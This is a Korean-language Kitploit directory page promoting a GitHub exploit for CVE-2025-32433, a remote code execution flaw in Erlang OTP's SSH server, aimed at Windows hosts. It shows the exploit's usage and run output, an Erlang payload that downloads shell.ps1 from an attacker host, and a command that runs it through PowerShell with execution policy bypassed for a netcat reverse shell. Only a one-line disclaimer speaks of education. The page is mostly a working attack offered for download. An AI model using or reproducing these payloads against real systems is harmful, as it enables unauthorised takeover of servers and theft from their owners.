Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/blackcat4347/cve-2025-32433-available-for-windows
Payload GenerationVulnerability AnalysisExploitationCommand and ControlLearning & EducationRemote Access Tool
GitHubblackcat4347/cve-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows

CVE-2025-32433-available-for-windows-victims

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
37개월 전아직 검토되지 않음

CVE-2025-32433

취약점 정보: https://nvd.nist.gov/vuln/detail/CVE-2025-32433

POC

root@kitploit:~
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -h
usage: cve-2025-32433.py [-h] [-d] [--host HOST] [--port PORT]

Exploit for CVE-2025-32433 (Erlang OTP SSH server).

options:
  -h, --help           show this help message and exit
  -d, --debug          Print raw response in hex format
  -t, --target TARGET  Target host (default: 127.0.0.1)
  -p, --port PORT      Target port (default: 2222)
  
kdev :: ~/erlang/CVE-2025-32433 ‹main*› » python3 cve-2025-32433.py -t 127.0.0.1 -p 2222
[*] Connecting to SSH server...
[✓] Banner: SSH-2.0-Erlang/5.1.4.7
[*] Sending KEXINIT...
[*] Opening channel...
[?] Shell command: your command
[*] Sending CHANNEL_REQUEST...
[✓] Payload sent.

페이로드 가져오기

root@kitploit:~
inets:start(), {ok, {_, _, Body}} = httpc:request("http://ip_attack/shell.ps1"), file:write_file("C:/Users/Public/shell.ps1", Body).

netcat 리스너 세션을 생성하고 명령을 실행합니다.

root@kitploit:~
os:cmd("powershell.exe -ExecutionPolicy Bypass -File C:/Users/Public/shell.ps1").

면책 조항

이 도구는 교육 목적과 승인된 보안 테스트 전용입니다. 작성자는 이 스크립트의 오용이나 이로 인한 손해에 대해 책임을 지지 않습니다.

도구 다운로드